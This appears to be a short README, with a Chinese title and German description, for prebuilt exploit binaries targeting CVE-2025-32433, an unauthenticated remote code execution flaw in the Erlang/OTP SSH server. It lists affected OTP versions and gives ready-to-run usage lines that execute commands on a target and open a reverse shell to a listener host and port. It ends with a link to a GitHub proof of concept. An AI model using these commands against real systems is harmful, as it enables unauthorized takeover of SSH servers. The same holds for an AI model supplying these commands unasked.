
CVE-2025-32433 Erlang/OTP SSH RCE Exploit SSH远程代码执行漏洞EXP
Eine schwerwiegende Sicherheitslücke wurde im Erlang/OTP SSH-Server identifiziert, die es einem Angreifer ermöglichen könnte, eine nicht authentifizierte Remote-Codeausführung (RCE) durchzuführen. Durch Ausnutzung eines Fehlers in der Behandlung von SSH-Protokollnachrichten könnte ein böswilliger Akteur unbefugten Zugriff auf betroffene Systeme erlangen und ohne gültige Anmeldeinformationen beliebige Befehle ausführen. Dies könnte zur Kompromittierung dieser Hosts führen, was unbefugten Zugriff auf und Manipulation sensibler Daten durch Dritte oder Denial-of-Service-Angriffe ermöglicht.
OTP-27.3.2 und früher
OTP-26.2.5.10 und früher
OTP-25.3.2.19 und früher
cve-2025-32433.exe 127.0.0.1 -c 'id'
./cve-2025-32433.lnx 127.0.0.1 -c 'id'
cve-2025-32433.exe 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444
./cve-2025-32433.lnx 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444

https://github.com/omer-efe-curkus/CVE-2025-32433-Erlang-OTP-SSH-RCE-PoC